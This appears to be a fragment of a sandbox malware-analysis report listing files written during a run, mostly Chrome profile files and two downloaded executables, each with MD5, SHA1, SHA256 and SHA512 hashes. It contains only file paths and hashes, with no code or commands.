SHA512 5e1b0b024f36288c1d2dd4bc5cf4e6b7d469e1e7e29dcef748d17a92b9396c94440eb27348cd2561d17593d8c705d4d9b51ae7b49b50c6dee85f73dec7100879

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 ac8ad0fe198a7873e6451dd7bef62402
SHA1 80323e408e3606c1997e91a6a214250e0cdcd133
SHA256 8145e1f9b607d2b72168ec4af172d81471022443617da26dc203a6513d3e0f27
SHA512 26f8f90a1128a577bc52416321d829cdcf01b17662647326b6d77e63f64ce35886659e3e0a2d6c9a5ecf19458efa2e9bf262b750e00b2763278df95092911c1b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\8704ffe1-ecdb-4eed-927f-013931a4f798.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 6ab0b220b253895d98d72dabd1b34db5
SHA1 01deb279f2e1551862d1e0b4a5eecdca20d6bea7
SHA256 d2483cf049e0b6213d3c8a469693280b4190098c5a14ef8ce848c601b644348c
SHA512 f4d85a541c18deef1f0a103c527393b4be8aea18ba1c7343774055bdbde24436515088c482a71e264586cc2f376bc79e239845e64e2bcc0dcce56b9bc0143cc7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 9dd34f87933266990ffeaf623fafc7fe
SHA1 77ba890df197311eb49e4dec8cf101f142910086
SHA256 c067fe7e751d46ef3eb435f51646f48e67c654e7ceebe98414fd94324e19a8b8
SHA512 5101dcea0db72b205b8d1baa62c61975cb9ed5551ecb85a05d39362a70c5d3bce5e4861dbd57bcc3493988636ddbdc80f7a5812821395ada116d9bd1464718e1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 11567c3c4a8362e6b63749bf1c025106
SHA1 c8fff0ddedb755aec5456037d87173fe3ea1a604
SHA256 85fc76d006030977cb9e103feec58a6d709aa46d68e02469ceaa93797ae567f2
SHA512 644067804944c50026d0f277d4a1db95021f6941f8ff9e58ef1479ba9b1bf7909600eb173924c0f3036daed97501af137e8b5eb8a064e36a06ff22a59279d6e9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 fdd33d6b854f74d587a7ef084d92530e
SHA1 417b5f964ebf6bd09c32ad5e5fd518a92e0b8091
SHA256 87673767b6e4dc48f81963c987b7f8281717f63865069374a1e82987c623c40c
SHA512 f8940aa29d36973aad9936f188f9a3a12842b31da635822fd17eaa3a64357799b2c2727a3cecc008b14db2c95f9878b204afd0295a0279dced63e6126f70fe4e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 54c826ca4427d2cc85c6c5e44f543664
SHA1 639bb3736e5ffdf25741f7d2f14a8416e5cac2ec
SHA256 c5bd06187e46346dca6b1007b401f9ef95613c7cbd1d358e36b6e2e75ddb18e1
SHA512 958e5a82d27dfadd68cfcf626bad2e47d77c45b8cd784b32a64159118a63f071f6224a19ff83804f84c177169021179cb4bf7f77d0e496c3124e77f323958b7a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 94a3ec35c6145d33efa58bf63aa446f3
SHA1 61788e8f82dcd126a69b46597a82796241a3d9cd
SHA256 865d3076fbb34e7f20c86d8eee5acc6c1d8f94e231fcc589b75ac0e586dbc77c
SHA512 351bee74ffafb504b76faf02e565af9de5ba1e18e78dd9bc089460dfd115a0af75c0e651f921207e21b28f1b18b7f076c258ef913e9b86d99212baaaabcddb23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 2419a19ce81288e4af16fce4572815a4
SHA1 6b4e313b62bdd6372eb5080cb18fe019f7d061b9
SHA256 f96458ee37267fe6179fa34c5c8a84c42ac02877f8299a82d24be0c645bf15dc
SHA512 0a8eda8d066ac89abf35dc993aa8600160216e90f1b7652f715afb88bc582b09387948be9e47ec4a4ee0f4a64edbe51c8503e45423be1e39d7b6156a2a6e3b8d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7c1ea103f4e1af911418a9386c06dfe4
SHA1 0aa3bcc19ea30d5c4c5db666ef6fda9f36885f6b
SHA256 d7c9d9692f1be643a505e7033e82e8daa7cab9d1475eb8190ff2f9bf86598b10
SHA512 579f99d217e39332ce4d723f1d02a19b6fe722f5054ec448ce26666b2b29e475facdf730fb305587f72e43d311fe92fa5d6b761857ebcd000e8338bcedafcaee

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 211b9fecaba0b8a5b61b509dad147fb3
SHA1 2d26bda783df2be7a2fccee3b563b5713a60388f
SHA256 f9673b45c6ff8da8ddfb6aae21e39e4d059303fd5570a270e14a9fd27566d700
SHA512 b0d681fbdf005bb7704509cb14ad5947a7c55e00d121f55ea58311581fd088e910f2f82e1d8075bfec3174ada1c54fdb9fcb7908704c87fd2c1de6541c3c2663

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 b18feab84facaeba5e383e27cfe92e31
SHA1 98722ed50f8ef1fa1fcfb46f5b549dd264cd86d9
SHA256 79b6292eca5c6214dac4dfb8b10dffd9fa3ed3e37c789f7e5327e4886af14750
SHA512 8282eb0847129420f18b1f079595c42882bfb4192d3a0c4f4ccfde4008b777cdcf2bdfbfd3f278301fd178f1d5965548bc195eeb79dd140c971501a3b9da09bf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 5621233bca3c4e8ef7eeeacf45278470
SHA1 4f83b9c0374c3166c4b20b3929fb3e3afeb0d4fd
SHA256 cbef86fa94caeb5d3b1aaded83d9db19d2b30758ecc246670c2d3e0df6f8ae3d
SHA512 71256cd1eac95a3027a2e744474b5cf76ddecc9ab6f1b7a210e585a7c3cc386a41d218466466ecd035b1b9b9f6c1ca30aef23bf015021dfb03c602ab783e9602

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 8ed24316f64b0297af38d2ff60180227
SHA1 c70abab14772feca321532997e201456597cf440
SHA256 2ca462c4adbdc92b3015b7e7f9925fd5f3572785aac35e97260def51a5abe0df
SHA512 1faa6ac7361dc89ab5ee2b415743876b72e39150e8ccf1006e5a5e4e7f15487dae9368c49e04c31c179c4e4bb26f8215004acfd9f292f3d9b38959524e2d7d2f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 0afa2a4f0ae43fd55ddfd257958fc274
SHA1 cf2e82ee80ac8d46bfa2a9e8cbade7f508d34c12
SHA256 63e29d71990e64e357469704e8e4da97f1d81bc3fab25bb49401eea9bdac6203
SHA512 971ad11f8d917b707f5f35d8785d1386b0bbbdc971c25f6fe97aa8efb5d0ac0dc048eedd93ed8bf15cb01e39b71c0797383905c6910322f8ada26760c6838617

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 e669d48a8e00f589ae3b627cf5d18968
SHA1 ffb12f0f86283dd708a0a92a704cd33e0b1e8259
SHA256 0749308de8ed4d3dd94d11b7bca46d617f55723df21e990ee0b5b315db0d8cd7
SHA512 f6b63a5c87527cd246df4e6f3b76cd1f132e40fd00b770609ba98ad157389492f97afc0570a37df686f9aa166d50cdf20587ca060254b469b7873425d910d65a

C:\Users\Admin\Downloads\IconDance.exe

MD5 7ad8c84dea7bd1e9cbb888734db28961
SHA1 58e047c7abecdd31d4e3c937b0ee89c98ab06c6a
SHA256 a4b6e53453d1874a6f78f0d7aa14dfafba778062f4b85b42b4c1001e1fc17095
SHA512 d34b087f7c6dd224e9bfe7a24364f878fc55c5368ce7395349ca063a7fd9ac555baed8431bfa13c331d7e58108b34e0f9d84482ce2e133f623dd086f14345adb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f3ad50c499e573a1342a552885bac44f
SHA1 401044479c900a1ce05f8e066121e13d1e8bd56d
SHA256 ff27361c9df5faf650e49a659fe889bb7e11e9480e02e93cf8d57ff62e0d5a57
SHA512 38ade99f63853b1842dab87a7d6e0c07f598910d236691d0ed80a69e16cb8a073548ae4112d7282f4aac15a56a922a11ee4c6c8106176472e5c22589630bd48d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 b537a7386701b6a682c38f6f9155d6a8
SHA1 482388553b294be6e4b5c4ebd4ea159490ed4a69
SHA256 d59933805093fcfdc86cf89a6640a31489bd0c72a2a3ad76e38d53c0c65a46e7
SHA512 d34bc3138db2886328b4ecf374cf23948000ee78c18d9d755b0c0e3de4e7e3bba3b98b394a70cf9dc77dc402668be14e73d1f859317e5842cf8758ab20e0a302

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 8a21ea0f5169d23e382bdaf8c80a53d9
SHA1 578cbbd4f6d46d77c187ec0f868668313e7ceac3
SHA256 ea30449521dce7108d129fba684db8a0bdacc48486d778dc75edca261971b20f
SHA512 f8af177e697fdb6abcbe1e47726702fc81593fbc9e378fa07bc9b673f5e7f83e6cb6f270f192c21b9635e0921f11fee1f63bcd65a538adb767276be80b5820fa

C:\Users\Admin\Downloads\DesktopPuzzle.exe

MD5 2f8f6e90ca211d7ef5f6cf3c995a40e7
SHA1 f8940f280c81273b11a20d4bfb43715155f6e122
SHA256 1f5a26f24a2bfdd301008f0cc51a6c3762f41b926f974c814f1ecaa4cb28e5e6
SHA512 2b38475550edee5519e33bd18fea510ad73345a27c20f6457710498d34e3d0cf05b0f96f32d018e7dc154a6f2232ea7e3145fd0ed5fb498f9e4702a4be1bb9c8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 79d60ef1007c7e8ca8634a254053b48d
SHA1 3d67c99f9770bd7f1a4f39c410723b98970528da
SHA256 f0ad3bb5a337bc2fd8272fdee9193918ad8330cd6f5ce56e274b7a3499d94dd0
SHA512 b9df4ed321033aa251cebdf3a0dedce155c79c34272dfdab4c592f584dff0e2ace746b9eea6c0ebf4b655eb7a8663a4f3ac44b0b51322877a547ec2ed04155e5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 bc5896b7b81771098722a45f7b1fa233
SHA1 30743adbc25463369c6d8eeb068c70c20aa10082
SHA256 ff9d58f126e880096f70ec8bc72ef5642cd8adb9d5d6c69311b36c156dca80be
SHA512 a9e45f8c5ccc4baa606675b2d83bf1f930ac6cd5af224ee1f1cb7da590bbfb4bbf29b9a7465698d0415c59d002132bf9ac9126644721d704c29e819e7beac984

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 ab81685d7e1074f30f04326b8f921029
SHA1 097e99fdf9b819e51168f92a769d14ac88a789f8
SHA256 90b8df008344bf9a177019af3fd2fb56615a3c90d7c41922af43b1c681415385
SHA512 879bc344c5c591ba14cc85542c386deba4fe42b971bbf96f1b5a0e9bb52144ceba97e1319780b38c8ecac45619917847fb23f77a564209f3fbb70531b82da32f